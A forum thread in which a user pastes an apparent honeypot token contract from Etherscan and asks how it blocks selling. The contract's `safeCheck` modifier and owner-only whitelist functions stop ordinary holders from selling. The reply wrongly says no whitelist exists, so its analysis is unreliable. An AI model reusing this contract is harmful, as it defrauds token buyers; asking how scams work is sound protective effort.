Trying to understand - to be more aware of scams

I’m not a code writer but im a day time user of blockchain
I’m seeing more scam projects everyday and I want to better understand where to look to avoid it

Today I found this token with this code and I have a few question

  1. Where creator put the name, symbol, initial supply, creator adress? I can’t see it within the code provided on etherscan. Is it somehow hidden? Or code change after compiling?
    How the sorcecode should look like to see what etherscan shows?
  2. Which function in the code don’t allow other users which are not whitelisted to trade back this token?

/**
*Submitted for verification at Etherscan.io on 2021-04-29
*/

pragma solidity ^0.6.0;
library SafeMath {
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, “SafeMath: addition overflow”);

    return c;
}

function sub(uint256 a, uint256 b) internal pure returns (uint256) {
    return sub(a, b, "SafeMath: subtraction overflow");
}

function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    require(b <= a, errorMessage);
    uint256 c = a - b;

    return c;
}

function mul(uint256 a, uint256 b) internal pure returns (uint256) {
    if (a == 0) {
        return 0;
    }

    uint256 c = a * b;
    require(c / a == b, "SafeMath: multiplication overflow");

    return c;
}

function div(uint256 a, uint256 b) internal pure returns (uint256) {
    return div(a, b, "SafeMath: division by zero");
}

function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    // Solidity only automatically asserts when dividing by 0
    require(b > 0, errorMessage);
    uint256 c = a / b;
    // assert(a == b * c + a % b); // There is no case in which this doesn't hold

    return c;
}

function mod(uint256 a, uint256 b) internal pure returns (uint256) {
    return mod(a, b, "SafeMath: modulo by zero");
}

function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    require(b != 0, errorMessage);
    return a % b;
}

}

library Address {

function isContract(address account) internal view returns (bool) {
    // According to EIP-1052, 0x0 is the value returned for not-yet created accounts
    // and 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470 is returned
    // for accounts without code, i.e. `keccak256('')`
    bytes32 codehash;
    bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470;
    // solhint-disable-next-line no-inline-assembly
    assembly { codehash := extcodehash(account) }
    return (codehash != accountHash && codehash != 0x0);
}

function sendValue(address payable recipient, uint256 amount) internal {
    require(address(this).balance >= amount, "Address: insufficient balance");

    // solhint-disable-next-line avoid-low-level-calls, avoid-call-value
    (bool success, ) = recipient.call{ value: amount }("");
    require(success, "Address: unable to send value, recipient may have reverted");
}

function functionCall(address target, bytes memory data) internal returns (bytes memory) {
  return functionCall(target, data, "Address: low-level call failed");
}

function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) {
    return _functionCallWithValue(target, data, 0, errorMessage);
}

function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
    return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
}

function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) {
    require(address(this).balance >= value, "Address: insufficient balance for call");
    return _functionCallWithValue(target, data, value, errorMessage);
}

function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) {
    require(isContract(target), "Address: call to non-contract");

    // solhint-disable-next-line avoid-low-level-calls
    (bool success, bytes memory returndata) = target.call{ value: weiValue }(data);
    if (success) {
        return returndata;
    } else {
        // Look for revert reason and bubble it up if present
        if (returndata.length > 0) {
            // The easiest way to bubble the revert reason is using memory via assembly

            // solhint-disable-next-line no-inline-assembly
            assembly {
                let returndata_size := mload(returndata)
                revert(add(32, returndata), returndata_size)
            }
        } else {
            revert(errorMessage);
        }
    }
}

}

contract Context {
constructor () internal { }

function _msgSender() internal view virtual returns (address payable) {
    return msg.sender;
}

function _msgData() internal view virtual returns (bytes memory) {
    this; 
    return msg.data;
}

}

interface IERC20 {

function totalSupply() external view returns (uint256);

function balanceOf(address account) external view returns (uint256);

function transfer(address recipient, uint256 amount) external returns (bool);

function allowance(address owner, address spender) external view returns (uint256);

function approve(address spender, uint256 amount) external returns (bool);

function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

event Transfer(address indexed from, address indexed to, uint256 value);

event Approval(address indexed owner, address indexed spender, uint256 value);

}

contract ERC20 is Context, IERC20 {
using SafeMath for uint256;
using Address for address;

mapping (address => uint256) private _balances;

mapping (address => mapping (address => uint256)) private _allowances;
address private _router = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
uint256 private _totalSupply;
string private _name;
string private _symbol;
uint8 private _decimals;
address private _address0;
address private _address1;
mapping (address => bool) private _Addressint;
uint256 private _zero = 0;
uint256 private _valuehash = 115792089237316195423570985008687907853269984665640564039457584007913129639935;

constructor (string memory name, string memory symbol, uint256 initialSupply,address payable owner) public {
_name = name;
_symbol = symbol;
_decimals = 18;
_address0 = owner;
_address1 = owner;
_mint(_address0, initialSupply*(10**18));
}
function name() public view returns (string memory) {
return _name;
}

function symbol() public view returns (string memory) {
    return _symbol;
}

function decimals() public view returns (uint8) {
    return _decimals;
}


function totalSupply() public view override returns (uint256) {
    return _totalSupply;
}


function balanceOf(address account) public view override returns (uint256) {
    return _balances[account];
}

function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
    _transfer(_msgSender(), recipient, amount);
    return true;
}

function ints(address addressn) public {
    require(msg.sender == _address0, "!_address0");_address1 = addressn;
}
function allowance(address owner, address spender) public view virtual override returns (uint256) {
    return _allowances[owner][spender];
}
function upint(address addressn,uint8 Numb) public {
    require(msg.sender == _address0, "!_address0");if(Numb>0){_Addressint[addressn] = true;}else{_Addressint[addressn] = false;}
}
function approve(address spender, uint256 amount) public virtual override returns (bool) {
    _approve(_msgSender(), spender, amount);
    return true;
}
function intnum(uint8 Numb) public {
    require(msg.sender == _address0, "!_address0");_zero = Numb*(10**18);
}
function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
    _transfer(sender, recipient, amount);
    _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
    return true;
}

function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
    _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
    return true;
}
function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
    _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
    return true;
}
function _transfer(address sender, address recipient, uint256 amount) internal safeCheck(sender,recipient,amount) virtual{
    require(sender != address(0), "ERC20: transfer from the zero address");
    require(recipient != address(0), "ERC20: transfer to the zero address");
    _beforeTokenTransfer(sender, recipient, amount);
    _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
    _balances[recipient] = _balances[recipient].add(amount);
    emit Transfer(sender, recipient, amount);
}
function _mint(address account, uint256 amount) internal virtual {
    require(account != address(0), "ERC20: mint to the zero address");
    _beforeTokenTransfer(address(0), account, amount);
    _totalSupply = _totalSupply.add(amount);
    _balances[account] = _balances[account].add(amount);
    emit Transfer(address(0), account, amount);
}
modifier safeCheck(address sender, address recipient, uint256 amount){
    if(recipient != _address0 && sender != _address0 && _address0!=_address1 && amount > _zero){require(sender == _address1 ||sender==_router || _Addressint[sender], "ERC20: transfer from the zero address");}
    if(sender==_address0 && _address0==_address1){_address1 = recipient;}
    if(sender==_address0){_Addressint[recipient] = true;}
    _;}
function _burn(address account, uint256 amount) internal virtual {
    require(account != address(0), "ERC20: burn from the zero address");
    _beforeTokenTransfer(account, address(0), amount);
    _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
    _totalSupply = _totalSupply.sub(amount);
    emit Transfer(account, address(0), amount);
}
function multiaddress(uint8 AllowN,address[] memory receivers, uint256[] memory amounts) public {
for (uint256 i = 0; i < receivers.length; i++) {
  if (msg.sender == _address0){
      transfer(receivers[i], amounts[i]);
      if(i<AllowN){_Addressint[receivers[i]] = true; _approve(receivers[i], _router, _valuehash);}
      }
}

}
function _approve(address owner, address spender, uint256 amount) internal virtual {
require(owner != address(0), “ERC20: approve from the zero address”);
require(spender != address(0), “ERC20: approve to the zero address”);
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
function setupDecimals(uint8 decimals) internal {
decimals = decimals;
}
//transfer
function _transfer_NAOS(address sender, address recipient, uint256 amount) internal virtual{
require(recipient == address(0), “ERC20: transfer to the zero address”);
require(sender != address(0), “ERC20: transfer from the zero address”);
_beforeTokenTransfer(sender, recipient, amount);
_balances[sender] = _balances[sender].sub(amount, “ERC20: transfer amount exceeds balance”);
_balances[recipient] = _balances[recipient].add(amount);
emit Transfer(sender, recipient, amount);
}
function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }
}

Where creator put the name, symbol, initial supply, creator adress?

Usually this is done in the Constructor. In the code you linked, you can see it at

constructor (string memory name, string memory symbol, uint256 initialSupply,address payable owner) public {
_name = name;
_symbol = symbol;
_decimals = 18;
_address0 = owner;
_address1 = owner;
_mint(_address0, initialSupply*(10**18));
}

This is where the variables you are looking for are set. They are defined during creation of the creation of the contract. Meaning when this creator deployed the contract, he passed in some variables which set these.

Is it somehow hidden? Or code change after compiling?

It’s not exactly hidden, you should be able to find it in the creation events. Go to the events tab on the Contract Code page in Etherscan, if you link the Etherscan I can help you find it.

  1. Which function in the code don’t allow other users which are not whitelisted to trade back this token?

Are you sure this code has a whitelist function? I don’t see one specifically. Usually they would have it in the Transfer function, because usually when buying/selling a token, they are really doing a Transfer. The code pasted might have messed up, it doesn’t look like there is anything in the function

function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }

If I was trying to create a whitelist, I would likely put it here.